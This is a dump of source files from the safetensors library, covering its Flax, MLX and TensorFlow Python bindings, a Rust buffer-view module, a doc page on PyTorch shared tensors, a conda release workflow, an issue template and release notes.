concurrently - GIL may not be released. " 75 | f"Latest start: {latest_start}, Earliest end: {earliest_end}", 76 | ) 77 | 78 | # Verify all output files are valid and contain correct data 79 | for file_name in file_names: 80 | loaded = load_file(file_name) 81 | np.testing.assert_array_equal( 82 | loaded["tensor_a"], 83 | tensor_a, 84 | err_msg=f"tensor_a mismatch in {file_name}", 85 | ) 86 | np.testing.assert_array_equal( 87 | loaded["tensor_b"], 88 | tensor_b, 89 | err_msg=f"tensor_b mismatch in {file_name}", 90 | ) 91 | finally: 92 | # Clean up all temporary files 93 | for file_name in file_names: 94 | if os.path.exists(file_name): 95 | os.remove(file_name) 96 | 97 | 98 | if __name__ == "__main__": 99 | unittest.main() 100 | -------------------------------------------------------------------------------- /bindings/python/py_src/safetensors/flax.py: -------------------------------------------------------------------------------- 1 | import os 2 | from typing import Dict, Optional, Union 3 | 4 | import numpy as np 5 | 6 | import jax.numpy as jnp 7 | from jax import Array 8 | from safetensors import numpy, safe_open 9 | 10 | 11 | def save(tensors: Dict[str, Array], metadata: Optional[Dict[str, str]] = None) -> bytes: 12 | """ 13 | Saves a dictionary of tensors into raw bytes in safetensors format. 14 | 15 | Args: 16 | tensors (`Dict[str, Array]`): 17 | The incoming tensors. Tensors need to be contiguous and dense. 18 | metadata (`Dict[str, str]`, *optional*, defaults to `None`): 19 | Optional text only metadata you might want to save in your header. 20 | For instance it can be useful to specify more about the underlying 21 | tensors. This is purely informative and does not affect tensor loading. 
22 | 23 | Returns: 24 | `bytes`: The raw bytes representing the format 25 | 26 | Example: 27 | 28 | ```python 29 | from safetensors.flax import save 30 | from jax import numpy as jnp 31 | 32 | tensors = {"embedding": jnp.zeros((512, 1024)), "attention": jnp.zeros((256, 256))} 33 | byte_data = save(tensors) 34 | ``` 35 | """ 36 | np_tensors = _jnp2np(tensors) 37 | return numpy.save(np_tensors, metadata=metadata) 38 | 39 | 40 | def save_file( 41 | tensors: Dict[str, Array], 42 | filename: Union[str, os.PathLike], 43 | metadata: Optional[Dict[str, str]] = None, 44 | ) -> None: 45 | """ 46 | Saves a dictionary of tensors into raw bytes in safetensors format. 47 | 48 | Args: 49 | tensors (`Dict[str, Array]`): 50 | The incoming tensors. Tensors need to be contiguous and dense. 51 | filename (`str`, or `os.PathLike`)): 52 | The filename we're saving into. 53 | metadata (`Dict[str, str]`, *optional*, defaults to `None`): 54 | Optional text only metadata you might want to save in your header. 55 | For instance it can be useful to specify more about the underlying 56 | tensors. This is purely informative and does not affect tensor loading. 57 | 58 | Returns: 59 | `None` 60 | 61 | Example: 62 | 63 | ```python 64 | from safetensors.flax import save_file 65 | from jax import numpy as jnp 66 | 67 | tensors = {"embedding": jnp.zeros((512, 1024)), "attention": jnp.zeros((256, 256))} 68 | save_file(tensors, "model.safetensors") 69 | ``` 70 | """ 71 | np_tensors = _jnp2np(tensors) 72 | return numpy.save_file(np_tensors, filename, metadata=metadata) 73 | 74 | 75 | def load(data: bytes) -> Dict[str, Array]: 76 | """ 77 | Loads a safetensors file into flax format from pure bytes. 78 | 79 | Args: 80 | data (`bytes`): 81 | The content of a safetensors file 82 | 83 | Returns: 84 | `Dict[str, Array]`: dictionary that contains name as key, value as `Array` on cpu 85 | 86 | Example: 87 | 88 | ```python 89 | from safetensors.flax import load 90 | 91 | file_path = "./my_folder/bert.safetensors" 92 | with open(file_path, "rb") as f: 93 | data = f.read() 94 | 95 | loaded = load(data) 96 | ``` 97 | """ 98 | flat = numpy.load(data) 99 | return _np2jnp(flat) 100 | 101 | 102 | def load_file(filename: Union[str, os.PathLike]) -> Dict[str, Array]: 103 | """ 104 | Loads a safetensors file into flax format. 
105 | 106 | Args: 107 | filename (`str`, or `os.PathLike`)): 108 | The name of the file which contains the tensors 109 | 110 | Returns: 111 | `Dict[str, Array]`: dictionary that contains name as key, value as `Array` 112 | 113 | Example: 114 | 115 | ```python 116 | from safetensors.flax import load_file 117 | 118 | file_path = "./my_folder/bert.safetensors" 119 | loaded = load_file(file_path) 120 | ``` 121 | """ 122 | result = {} 123 | with safe_open(filename, framework="flax") as f: 124 | for k in f.offset_keys(): 125 | result[k] = f.get_tensor(k) 126 | return result 127 | 128 | 129 | def _np2jnp(numpy_dict: Dict[str, np.ndarray]) -> Dict[str, Array]: 130 | for k, v in numpy_dict.items(): 131 | numpy_dict[k] = jnp.array(v) 132 | return numpy_dict 133 | 134 | 135 | def _jnp2np(jnp_dict: Dict[str, Array]) -> Dict[str, np.array]: 136 | for k, v in jnp_dict.items(): 137 | jnp_dict[k] = np.asarray(v) 138 | return jnp_dict 139 | -------------------------------------------------------------------------------- /bindings/python/py_src/safetensors/mlx.py: -------------------------------------------------------------------------------- 1 | import os 2 | from typing import Dict, Optional, Union 3 | 4 | import numpy as np 5 | 6 | import mlx.core as mx 7 | from safetensors import numpy, safe_open 8 | 9 | 10 | def save( 11 | tensors: Dict[str, mx.array], metadata: Optional[Dict[str, str]] = None 12 | ) -> bytes: 13 | """ 14 | Saves a dictionary of tensors into raw bytes in safetensors format. 15 | 16 | Args: 17 | tensors (`Dict[str, mx.array]`): 18 | The incoming tensors. Tensors need to be contiguous and dense. 19 | metadata (`Dict[str, str]`, *optional*, defaults to `None`): 20 | Optional text only metadata you might want to save in your header. 21 | For instance it can be useful to specify more about the underlying 22 | tensors. This is purely informative and does not affect tensor loading. 23 | 24 | Returns: 25 | `bytes`: The raw bytes representing the format 26 | 27 | Example: 28 | 29 | ```python 30 | from safetensors.mlx import save 31 | import mlx.core as mx 32 | 33 | tensors = {"embedding": mx.zeros((512, 1024)), "attention": mx.zeros((256, 256))} 34 | byte_data = save(tensors) 35 | ``` 36 | """ 37 | np_tensors = _mx2np(tensors) 38 | return numpy.save(np_tensors, metadata=metadata) 39 | 40 | 41 | def save_file( 42 | tensors: Dict[str, mx.array], 43 | filename: Union[str, os.PathLike], 44 | metadata: Optional[Dict[str, str]] = None, 45 | ) -> None: 46 | """ 47 | Saves a dictionary of tensors into raw bytes in safetensors format. 48 | 49 | Args: 50 | tensors (`Dict[str, mx.array]`): 51 | The incoming tensors. Tensors need to be contiguous and dense. 52 | filename (`str`, or `os.PathLike`)): 53 | The filename we're saving into. 54 | metadata (`Dict[str, str]`, *optional*, defaults to `None`): 55 | Optional text only metadata you might want to save in your header. 56 | For instance it can be useful to specify more about the underlying 57 | tensors. This is purely informative and does not affect tensor loading. 
58 | 59 | Returns: 60 | `None` 61 | 62 | Example: 63 | 64 | ```python 65 | from safetensors.mlx import save_file 66 | import mlx.core as mx 67 | 68 | tensors = {"embedding": mx.zeros((512, 1024)), "attention": mx.zeros((256, 256))} 69 | save_file(tensors, "model.safetensors") 70 | ``` 71 | """ 72 | np_tensors = _mx2np(tensors) 73 | return numpy.save_file(np_tensors, filename, metadata=metadata) 74 | 75 | 76 | def load(data: bytes) -> Dict[str, mx.array]: 77 | """ 78 | Loads a safetensors file into MLX format from pure bytes. 79 | 80 | Args: 81 | data (`bytes`): 82 | The content of a safetensors file 83 | 84 | Returns: 85 | `Dict[str, mx.array]`: dictionary that contains name as key, value as `mx.array` 86 | 87 | Example: 88 | 89 | ```python 90 | from safetensors.mlx import load 91 | 92 | file_path = "./my_folder/bert.safetensors" 93 | with open(file_path, "rb") as f: 94 | data = f.read() 95 | 96 | loaded = load(data) 97 | ``` 98 | """ 99 | flat = numpy.load(data) 100 | return _np2mx(flat) 101 | 102 | 103 | def load_file(filename: Union[str, os.PathLike]) -> Dict[str, mx.array]: 104 | """ 105 | Loads a safetensors file into MLX format. 106 | 107 | Args: 108 | filename (`str`, or `os.PathLike`)): 109 | The name of the file which contains the tensors 110 | 111 | Returns: 112 | `Dict[str, mx.array]`: dictionary that contains name as key, value as `mx.array` 113 | 114 | Example: 115 | 116 | ```python 117 | from safetensors.flax import load_file 118 | 119 | file_path = "./my_folder/bert.safetensors" 120 | loaded = load_file(file_path) 121 | ``` 122 | """ 123 | result = {} 124 | with safe_open(filename, framework="mlx") as f: 125 | for k in f.offset_keys(): 126 | result[k] = f.get_tensor(k) 127 | return result 128 | 129 | 130 | def _np2mx(numpy_dict: Dict[str, np.ndarray]) -> Dict[str, mx.array]: 131 | for k, v in numpy_dict.items(): 132 | numpy_dict[k] = mx.array(v) 133 | return numpy_dict 134 | 135 | 136 | def _mx2np(mx_dict: Dict[str, mx.array]) -> Dict[str, np.array]: 137 | new_dict = {} 138 | for k, v in mx_dict.items(): 139 | new_dict[k] = np.asarray(v) 140 | return new_dict 141 | -------------------------------------------------------------------------------- /bindings/python/py_src/safetensors/tensorflow.py: -------------------------------------------------------------------------------- 1 | import os 2 | from typing import Dict, Optional, Union 3 | 4 | import numpy as np 5 | import tensorflow as tf 6 | 7 | from safetensors import numpy, safe_open 8 | 9 | 10 | def save( 11 | tensors: Dict[str, tf.Tensor], metadata: Optional[Dict[str, str]] = None 12 | ) -> bytes: 13 | """ 14 | Saves a dictionary of tensors into raw bytes in safetensors format. 15 | 16 | Args: 17 | tensors (`Dict[str, tf.Tensor]`): 18 | The incoming tensors. Tensors need to be contiguous and dense. 19 | metadata (`Dict[str, str]`, *optional*, defaults to `None`): 20 | Optional text only metadata you might want to save in your header. 21 | For instance it can be useful to specify more about the underlying 22 | tensors. This is purely informative and does not affect tensor loading. 
23 | 24 | Returns: 25 | `bytes`: The raw bytes representing the format 26 | 27 | Example: 28 | 29 | ```python 30 | from safetensors.tensorflow import save 31 | import tensorflow as tf 32 | 33 | tensors = {"embedding": tf.zeros((512, 1024)), "attention": tf.zeros((256, 256))} 34 | byte_data = save(tensors) 35 | ``` 36 | """ 37 | np_tensors = _tf2np(tensors) 38 | return numpy.save(np_tensors, metadata=metadata) 39 | 40 | 41 | def save_file( 42 | tensors: Dict[str, tf.Tensor], 43 | filename: Union[str, os.PathLike], 44 | metadata: Optional[Dict[str, str]] = None, 45 | ) -> None: 46 | """ 47 | Saves a dictionary of tensors into raw bytes in safetensors format. 48 | 49 | Args: 50 | tensors (`Dict[str, tf.Tensor]`): 51 | The incoming tensors. Tensors need to be contiguous and dense. 52 | filename (`str`, or `os.PathLike`)): 53 | The filename we're saving into. 54 | metadata (`Dict[str, str]`, *optional*, defaults to `None`): 55 | Optional text only metadata you might want to save in your header. 56 | For instance it can be useful to specify more about the underlying 57 | tensors. This is purely informative and does not affect tensor loading. 58 | 59 | Returns: 60 | `None` 61 | 62 | Example: 63 | 64 | ```python 65 | from safetensors.tensorflow import save_file 66 | import tensorflow as tf 67 | 68 | tensors = {"embedding": tf.zeros((512, 1024)), "attention": tf.zeros((256, 256))} 69 | save_file(tensors, "model.safetensors") 70 | ``` 71 | """ 72 | np_tensors = _tf2np(tensors) 73 | return numpy.save_file(np_tensors, filename, metadata=metadata) 74 | 75 | 76 | def load(data: bytes) -> Dict[str, tf.Tensor]: 77 | """ 78 | Loads a safetensors file into tensorflow format from pure bytes. 79 | 80 | Args: 81 | data (`bytes`): 82 | The content of a safetensors file 83 | 84 | Returns: 85 | `Dict[str, tf.Tensor]`: dictionary that contains name as key, value as `tf.Tensor` on cpu 86 | 87 | Example: 88 | 89 | ```python 90 | from safetensors.tensorflow import load 91 | 92 | file_path = "./my_folder/bert.safetensors" 93 | with open(file_path, "rb") as f: 94 | data = f.read() 95 | 96 | loaded = load(data) 97 | ``` 98 | """ 99 | flat = numpy.load(data) 100 | return _np2tf(flat) 101 | 102 | 103 | def load_file(filename: Union[str, os.PathLike]) -> Dict[str, tf.Tensor]: 104 | """ 105 | Loads a safetensors file into tensorflow format. 
106 | 107 | Args: 108 | filename (`str`, or `os.PathLike`)): 109 | The name of the file which contains the tensors 110 | 111 | Returns: 112 | `Dict[str, tf.Tensor]`: dictionary that contains name as key, value as `tf.Tensor` 113 | 114 | Example: 115 | 116 | ```python 117 | from safetensors.tensorflow import load_file 118 | 119 | file_path = "./my_folder/bert.safetensors" 120 | loaded = load_file(file_path) 121 | ``` 122 | """ 123 | result = {} 124 | with safe_open(filename, framework="tf") as f: 125 | for k in f.offset_keys(): 126 | result[k] = f.get_tensor(k) 127 | return result 128 | 129 | 130 | def _np2tf(numpy_dict: Dict[str, np.ndarray]) -> Dict[str, tf.Tensor]: 131 | for k, v in numpy_dict.items(): 132 | numpy_dict[k] = tf.convert_to_tensor(v) 133 | return numpy_dict 134 | 135 | 136 | def _tf2np(tf_dict: Dict[str, tf.Tensor]) -> Dict[str, np.array]: 137 | for k, v in tf_dict.items(): 138 | tf_dict[k] = v.numpy() 139 | return tf_dict 140 | -------------------------------------------------------------------------------- /docs/source/torch_shared_tensors.mdx: -------------------------------------------------------------------------------- 1 | # Torch shared tensors 2 | 3 | 4 | ## TL;DR 5 | 6 | Using specific functions, which should work in most cases for you. 7 | This is not without side effects. 8 | 9 | ```python 10 | from safetensors.torch import load_model, save_model 11 | 12 | save_model(model, "model.safetensors") 13 | # Instead of save_file(model.state_dict(), "model.safetensors") 14 | 15 | load_model(model, "model.safetensors") 16 | # Instead of model.load_state_dict(load_file("model.safetensors")) 17 | ``` 18 | 19 | ## What are shared tensors ? 20 | 21 | Pytorch uses shared tensors for some computation. 22 | This is extremely interesting to reduce memory usage in general. 23 | 24 | One very classic use case is in transformers the `embeddings` are shared with 25 | `lm_head`. By using the same matrix, the model uses less parameters, and gradients 26 | flow much better to the `embeddings` (which is the start of the model, so they don't 27 | flow easily there, whereas `lm_head` is at the tail of the model, so gradients are 28 | extremely good over there, since they are the same tensors, they both benefit) 29 | 30 | 31 | ```python 32 | from torch import nn 33 | 34 | class Model(nn.Module): 35 | def __init__(self): 36 | super().__init__() 37 | self.a = nn.Linear(100, 100) 38 | self.b = self.a 39 | 40 | def forward(self, x): 41 | return self.b(self.a(x)) 42 | 43 | 44 | model = Model() 45 | print(model.state_dict()) 46 | # odict_keys(['a.weight', 'a.bias', 'b.weight', 'b.bias']) 47 | torch.save(model.state_dict(), "model.bin") 48 | # This file is now 41k instead of ~80k, because A and B are the same weight hence only 1 is saved on disk with both `a` and `b` pointing to the same buffer 49 | ``` 50 | 51 | ## Why are shared tensors not saved in `safetensors` ? 52 | 53 | Multiple reasons for that: 54 | 55 | - *Not all frameworks support them* for instance `tensorflow` does not. 56 | So if someone saves shared tensors in torch, there is no way to 57 | load them in a similar fashion so we could not keep the same `Dict[str, Tensor]` 58 | API. 59 | - *It makes lazy loading very quickly.* 60 | Lazy loading is the ability to load only some tensors, or part of tensors for 61 | a given file. 
This is trivial to do without sharing tensors, but it becomes tricky with tensor sharing: 62 | 63 | ```python 64 | with safe_open("model.safetensors", framework="pt") as f: 65 |     a = f.get_tensor("a") 66 |     b = f.get_tensor("b") 67 | ``` 68 | 69 | Now it's impossible with this given code to "reshare" buffers after the fact. 70 | Once we give out the `a` tensor, we have no way to give back the same memory when 71 | you ask for `b`. (In this particular example we could keep track of the buffers we handed out, 72 | but this is not the case in general, since you could do arbitrary work with `a`, 73 | like sending it to another device, before asking for `b`.) 74 | - *It can lead to a much larger file than necessary*. 75 | If you are saving a shared tensor which is only a fraction of a larger tensor, 76 | then saving it with pytorch leads to saving the entire buffer instead of saving 77 | just what is needed. 78 | 79 | ```python 80 | a = torch.zeros((100, 100)) 81 | b = a[:1, :] 82 | torch.save({"b": b}, "model.bin") 83 | # File is 41k instead of the expected 400 bytes 84 | # In practice it could happen that you save several 10GB instead of 1GB. 85 | ``` 86 | 87 | Now, with all those reasons mentioned, nothing here is set in stone. 88 | Shared tensors do not cause unsafety or denial-of-service potential, so this 89 | decision could be revisited if the current workarounds are not satisfactory. 90 | 91 | ## How does it work ? 92 | 93 | The design is rather simple. 94 | We're going to look for all shared tensors, then look for all tensors 95 | covering the entire buffer (there can be multiple such tensors). 96 | That gives us multiple names which could be saved; we simply choose the first one. 97 | 98 | During `load_model`, we load a bit like `load_state_dict` does, except 99 | we look into the model itself to check for shared buffers, and we ignore 100 | the "missing keys" which were actually covered by virtue of buffer sharing (they 101 | were properly loaded since there was a buffer that loaded under the hood). 102 | Every other error is raised as-is. 103 | 104 | **Caveat**: This means we're dropping some keys within the file. If you check 105 | the keys saved on disk, or if you use `load_state_dict`, you will see some 106 | "missing tensors". Unless we start supporting shared tensors directly in 107 | the format, there's no real way around it.
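To make the buffer-sharing detection described above a bit more concrete, here is a rough sketch of the idea. This is an illustration only, not the actual `safetensors.torch` implementation; it assumes a recent PyTorch with `untyped_storage()` and ignores strides and storage offsets:

```python
from collections import defaultdict


def pick_names_to_save(state_dict):
    # Group tensor names by the underlying storage they point to.
    groups = defaultdict(list)
    for name, tensor in state_dict.items():
        groups[tensor.untyped_storage().data_ptr()].append(name)

    kept = []
    for names in groups.values():
        # Prefer a tensor that covers the entire shared buffer...
        full = [
            name for name in names
            if state_dict[name].numel() * state_dict[name].element_size()
            == state_dict[name].untyped_storage().nbytes()
        ]
        # ...and "we simply choose the first one".
        kept.append((full or names)[0])
    return kept
```

For the `Model` example at the top of this page, this keeps only one of `a.weight`/`b.weight` (and one of the biases), which is why the saved file appears to be "missing" some keys.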
108 | -------------------------------------------------------------------------------- /.github/workflows/python-release-conda.yml: -------------------------------------------------------------------------------- 1 | name: Python Release - Conda 2 | 3 | on: 4 | push: 5 | tags: 6 | - v* 7 | 8 | env: 9 | ANACONDA_API_TOKEN: ${{ secrets.ANACONDA_API_TOKEN }} 10 | 11 | jobs: 12 | build_and_package: 13 | runs-on: ${{ matrix.os }} 14 | strategy: 15 | matrix: 16 | os: [windows-latest, macos-latest] 17 | python: ["3.9", "3.10", "3.11", "3.12", "3.13"] 18 | 19 | steps: 20 | - name: Checkout repository 21 | uses: actions/checkout@v6 22 | 23 | - name: Install miniconda 24 | uses: conda-incubator/setup-miniconda@v3 25 | with: 26 | auto-update-conda: true 27 | miniconda-version: "latest" 28 | python-version: ${{ matrix.python }} 29 | channels: conda-forge 30 | 31 | - name: Conda info 32 | shell: bash -l {0} 33 | run: conda info 34 | 35 | - name: Install Rust 36 | uses: dtolnay/rust-toolchain@stable 37 | 38 | - name: Setup conda env 39 | shell: bash -l {0} 40 | run: | 41 | conda install setuptools-rust 42 | conda install -c defaults anaconda-client conda-build 43 | 44 | - name: Extract version 45 | shell: bash -l {0} 46 | working-directory: ./bindings/python 47 | run: echo "SAFETENSORS_VERSION=`grep -m 1 version Cargo.toml | grep -e '".*"' -o | tr -d '"' | sed s/-/./ `" >> $GITHUB_ENV 48 | 49 | - name: Build conda packages 50 | shell: bash -l {0} 51 | run: | 52 | conda info 53 | conda list 54 | conda-build .github/conda --python=${{ matrix.python }} 55 | 56 | - name: Upload to Anaconda 57 | shell: bash -l {0} 58 | run: | 59 | anaconda upload `conda-build .github/conda --output` --force 60 | 61 | build_and_package_linux: 62 | runs-on: ubuntu-latest 63 | container: quay.io/pypa/manylinux_2_28_x86_64 64 | 65 | strategy: 66 | fail-fast: false 67 | matrix: 68 | python: [39, 310, 311, 312, 313] 69 | include: 70 | - python: 39 71 | checksum: d8d13344b46a057659397b9ca1a948d184bf59f04efa8864df8c01f7557e2baa 72 | - python: 310 73 | checksum: 04a8b03d8b0ec062d923e592201a6fd88b7247c309ef8848afb25c424c40ac39 74 | - python: 311 75 | checksum: 238abad23f8d4d8ba89dd05df0b0079e278909a36e06955f12bbef4aa94e6131 76 | - python: 312 77 | checksum: a0def9c732d94b156529ef7db8edd6e1862cee784a27a4961870dca86e89fba4 78 | - python: 313 79 | checksum: 6022714da22986097bbefa13dab3d957257fef04e1c37d1ebd3645b5b99bc9d4 80 | 81 | steps: 82 | - name: Checkout repository 83 | uses: actions/checkout@v6 84 | 85 | - name: Install miniconda 86 | run: | 87 | yum install -y wget openssl-devel 88 | export FILENAME=Miniconda3-py${{ matrix.python }}_25.9.1-1-Linux-x86_64.sh 89 | wget https://repo.anaconda.com/miniconda/$FILENAME 90 | sha256sum $FILENAME | awk '$1=="${{ matrix.checksum}}"{print"good to go"}' 91 | bash $FILENAME -b -p $HOME/miniconda 92 | source $HOME/miniconda/bin/activate 93 | 94 | - name: Show glibc information 95 | shell: bash -l {0} 96 | run: ldd --version 97 | 98 | - name: Conda info 99 | shell: bash -l {0} 100 | run: | 101 | source $HOME/miniconda/bin/activate 102 | conda info 103 | 104 | - name: Install Rust 105 | uses: dtolnay/rust-toolchain@stable 106 | 107 | - name: Setup conda env 108 | shell: bash -l {0} 109 | run: | 110 | source $HOME/miniconda/bin/activate 111 | conda install setuptools-rust 112 | conda install -c defaults anaconda-client conda-build 113 | 114 | - name: Extract version 115 | shell: bash -l {0} 116 | working-directory: ./bindings/python 117 | run: | 118 | source $HOME/miniconda/bin/activate 119 | echo 
"SAFETENSORS_VERSION=`grep -m 1 version Cargo.toml | grep -e '".*"' -o | tr -d '"' | sed s/-/./ `" >> $GITHUB_ENV 120 | 121 | - name: Build conda packages 122 | shell: bash -l {0} 123 | run: | 124 | source $HOME/miniconda/bin/activate 125 | conda info 126 | conda list 127 | conda-build .github/conda --python=${{ matrix.python }} 128 | 129 | - name: Upload to Anaconda 130 | shell: bash -l {0} 131 | run: | 132 | source $HOME/miniconda/bin/activate 133 | anaconda upload `conda-build .github/conda --output` --force 134 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/bug-report.yml: -------------------------------------------------------------------------------- 1 | name: "\U0001F41B Bug Report" 2 | description: Submit a bug report to help us improve safetensors 3 | body: 4 | - type: textarea 5 | id: system-info 6 | attributes: 7 | label: System Info 8 | description: Please share your system info with us. You can run the command `transformers-cli env` and copy-paste its output below. 9 | placeholder: safetensors version, platform, python version, ... 10 | validations: 11 | required: true 12 | 13 | # - type: textarea 14 | # id: who-can-help 15 | # attributes: 16 | # label: Who can help? 17 | # description: | 18 | # Your issue will be replied to more quickly if you can figure out the right person to tag with @ 19 | # If you know how to use git blame, that is the easiest way, otherwise, here is a rough guide of **who to tag**. 20 | # 21 | # All issues are read by one of the core maintainers, so if you don't know who to tag, just leave this blank and 22 | # a core maintainer will ping the right person. 23 | # 24 | # Please tag fewer than 3 people. 25 | # 26 | # Models: 27 | 28 | # - text models: @ArthurZucker and @younesbelkada 29 | # - vision models: @amyeroberts 30 | # - speech models: @sanchit-gandhi 31 | # - graph models: @clefourrier 32 | # 33 | # Library: 34 | # 35 | # - flax: @sanchit-gandhi 36 | # - generate: @gante 37 | # - pipelines: @Narsil 38 | # - tensorflow: @gante and @Rocketknight1 39 | # - tokenizers: @ArthurZucker 40 | # - trainer: @sgugger 41 | # 42 | # Integrations: 43 | # 44 | # - deepspeed: HF Trainer: @stas00, Accelerate: @pacman100 45 | # - ray/raytune: @richardliaw, @amogkam 46 | # - Big Model Inference: @sgugger @muellerzr 47 | # 48 | # Documentation: @sgugger, @stevhliu and @MKhalusova 49 | # 50 | # Model hub: 51 | 52 | # - for issues with a model, report at https://discuss.huggingface.co/ and tag the model's creator. 53 | # 54 | # HF projects: 55 | # 56 | # - accelerate: [different repo](https://github.com/huggingface/accelerate) 57 | # - datasets: [different repo](https://github.com/huggingface/datasets) 58 | # - diffusers: [different repo](https://github.com/huggingface/diffusers) 59 | # - rust tokenizers: [different repo](https://github.com/huggingface/tokenizers) 60 | # 61 | # Maintained examples (not research project or legacy): 62 | # 63 | # - Flax: @sanchit-gandhi 64 | # - PyTorch: @sgugger 65 | # - TensorFlow: @Rocketknight1 66 | 67 | # Research projects are not maintained and should be taken as is. 68 | 69 | # placeholder: "@Username ..." 
70 | 71 | - type: checkboxes 72 | id: information-scripts-examples 73 | attributes: 74 | label: Information 75 | description: 'The problem arises when using:' 76 | options: 77 | - label: "The official example scripts" 78 | - label: "My own modified scripts" 79 | 80 | - type: textarea 81 | id: reproduction 82 | validations: 83 | required: true 84 | attributes: 85 | label: Reproduction 86 | description: | 87 | Please provide a code sample that reproduces the problem you ran into. It can be a Colab link or just a code snippet. 88 | If you have code snippets, error messages, stack traces please provide them here as well. 89 | Important! Use code tags to correctly format your code. See https://help.github.com/en/github/writing-on-github/creating-and-highlighting-code-blocks#syntax-highlighting 90 | Do not use screenshots, as they are hard to read and (more importantly) don't allow others to copy-and-paste your code. 91 | 92 | placeholder: | 93 | Steps to reproduce the behavior: 94 | 95 | 1. 96 | 2. 97 | 3. 98 | 99 | 100 | - type: textarea 101 | id: expected-behavior 102 | validations: 103 | required: true 104 | attributes: 105 | label: Expected behavior 106 | description: "A clear and concise description of what you would expect to happen." 107 | -------------------------------------------------------------------------------- /bindings/python/src/view.rs: -------------------------------------------------------------------------------- 1 | use crate::SafetensorError; 2 | #[cfg(feature = "py311")] 3 | use pyo3::buffer::PyBuffer; 4 | use pyo3::prelude::*; 5 | #[cfg(feature = "py38")] 6 | use pyo3::types::PyBytes; 7 | use pyo3::types::PyDict; 8 | use pyo3::Bound as PyBound; 9 | use safetensors::{Dtype, View}; 10 | use std::borrow::Cow; 11 | use std::collections::HashMap; 12 | 13 | #[cfg(feature = "py38")] 14 | pub struct PyView<'a> { 15 | shape: Vec, 16 | dtype: Dtype, 17 | data: PyBound<'a, PyBytes>, 18 | data_len: usize, 19 | } 20 | 21 | #[cfg(feature = "py311")] 22 | pub struct PyView<'a> { 23 | shape: Vec, 24 | dtype: Dtype, 25 | data: PyBuffer, 26 | data_len: usize, 27 | // Kept to keep the GIL open while we hold the buffer 28 | _py: Python<'a>, 29 | } 30 | 31 | impl View for &PyView<'_> { 32 | #[cfg(feature = "py38")] 33 | fn data(&self) -> std::borrow::Cow<[u8]> { 34 | Cow::Borrowed(self.data.as_bytes()) 35 | } 36 | #[cfg(feature = "py311")] 37 | fn data(&self) -> std::borrow::Cow<[u8]> { 38 | // We already checked this in the Python side. 39 | assert!(self.data.is_c_contiguous()); 40 | // XXX: Ideally we could have at least readonly tensors 41 | // assert!(self.data.readonly()); 42 | // SAFETY: 43 | // This is actually totally unsafe, PyBuffer is not immutable and could be changed from 44 | // under us. 45 | // This is made safer because we're still hanging to the GIL while treating 46 | // this structure 47 | Cow::Borrowed(unsafe { 48 | std::slice::from_raw_parts(self.data.buf_ptr() as *const u8, self.data.item_count()) 49 | }) 50 | } 51 | fn shape(&self) -> &[usize] { 52 | &self.shape 53 | } 54 | fn dtype(&self) -> Dtype { 55 | self.dtype 56 | } 57 | fn data_len(&self) -> usize { 58 | self.data_len 59 | } 60 | } 61 | 62 | pub fn prepare(tensor_dict: HashMap>) -> PyResult> { 63 | let mut tensors = HashMap::with_capacity(tensor_dict.len()); 64 | for (tensor_name, tensor_desc) in &tensor_dict { 65 | let mut shape: Vec = tensor_desc 66 | .get_item("shape")? 67 | .ok_or_else(|| SafetensorError::new_err(format!("Missing `shape` in {tensor_desc:?}")))? 
68 | .extract()?; 69 | let pydata: PyBound = tensor_desc.get_item("data")?.ok_or_else(|| { 70 | SafetensorError::new_err(format!("Missing `data` in {tensor_desc:?}")) 71 | })?; 72 | 73 | let pydtype = tensor_desc.get_item("dtype")?.ok_or_else(|| { 74 | SafetensorError::new_err(format!("Missing `dtype` in {tensor_desc:?}")) 75 | })?; 76 | let dtype: String = pydtype.extract()?; 77 | let dtype = match dtype.as_ref() { 78 | "bool" => Dtype::BOOL, 79 | "int8" => Dtype::I8, 80 | "uint8" => Dtype::U8, 81 | "int16" => Dtype::I16, 82 | "uint16" => Dtype::U16, 83 | "int32" => Dtype::I32, 84 | "uint32" => Dtype::U32, 85 | "int64" => Dtype::I64, 86 | "uint64" => Dtype::U64, 87 | "float16" => Dtype::F16, 88 | "float32" => Dtype::F32, 89 | "float64" => Dtype::F64, 90 | "bfloat16" => Dtype::BF16, 91 | "float8_e4m3fn" => Dtype::F8_E4M3, 92 | "float8_e5m2" => Dtype::F8_E5M2, 93 | "float8_e8m0fnu" => Dtype::E8M0, 94 | "float4_e2m1fn_x2" => Dtype::F4, 95 | "complex64" => Dtype::C64, 96 | dtype_str => { 97 | return Err(SafetensorError::new_err(format!( 98 | "dtype {dtype_str} is not covered", 99 | ))); 100 | } 101 | }; 102 | if dtype == Dtype::F4 { 103 | let n = shape.len(); 104 | shape[n - 1] *= 2; 105 | } 106 | 107 | #[cfg(feature = "py311")] 108 | let tensor = { 109 | let data: PyBuffer = pydata.extract()?; 110 | if !data.is_c_contiguous() { 111 | return Err(SafetensorError::new_err("Python buffer is not contiguous")); 112 | } 113 | // XXX Ideally this would be true. 114 | // if !data.readonly() { 115 | // return Err(SafetensorError::new_err("Python buffer is not readonly")); 116 | // } 117 | let data_len = data.item_count(); 118 | let py = pydata.py(); 119 | PyView { 120 | shape, 121 | dtype, 122 | data, 123 | data_len, 124 | _py: py, 125 | } 126 | }; 127 | 128 | #[cfg(feature = "py38")] 129 | let tensor = { 130 | let data: &[u8] = pydata.extract()?; 131 | let data_len = data.len(); 132 | let data: PyBound = pydata.extract()?; 133 | PyView { 134 | shape, 135 | dtype, 136 | data, 137 | data_len, 138 | } 139 | }; 140 | 141 | tensors.insert(tensor_name.to_string(), tensor); 142 | } 143 | Ok(tensors) 144 | } 145 | -------------------------------------------------------------------------------- /RELEASE.md: -------------------------------------------------------------------------------- 1 | ## How to release 2 | 3 | # Before the release 4 | 5 | Simple checklist on how to make releases for `safetensors`. 6 | 7 | - Freeze `main` branch. 8 | - Run all tests (Check CI has properly run) 9 | - If any significant work, check benchmarks: 10 | - `cd safetensors && cargo bench` (needs to be run on latest release tag to measure difference if it's your first time) 11 | - Run all `transformers` tests. (`transformers` is a big user of `safetensors` we need 12 | to make sure we don't break it, testing is one way to make sure nothing unforeseen 13 | has been done.) 14 | - Run all fast tests at the VERY least (not just the tokenization tests). (`RUN_PIPELINE_TESTS=1 CUDA_VISIBLE_DEVICES=-1 pytest -sv tests/`) 15 | - When all *fast* tests work, then we can also (it's recommended) run the whole `transformers` 16 | test suite. 17 | - Rebase this [PR](https://github.com/huggingface/transformers/pull/16708). 18 | This will create new docker images ready to run the tests suites with `safetensors` from the main branch. 19 | - Wait for actions to finish 20 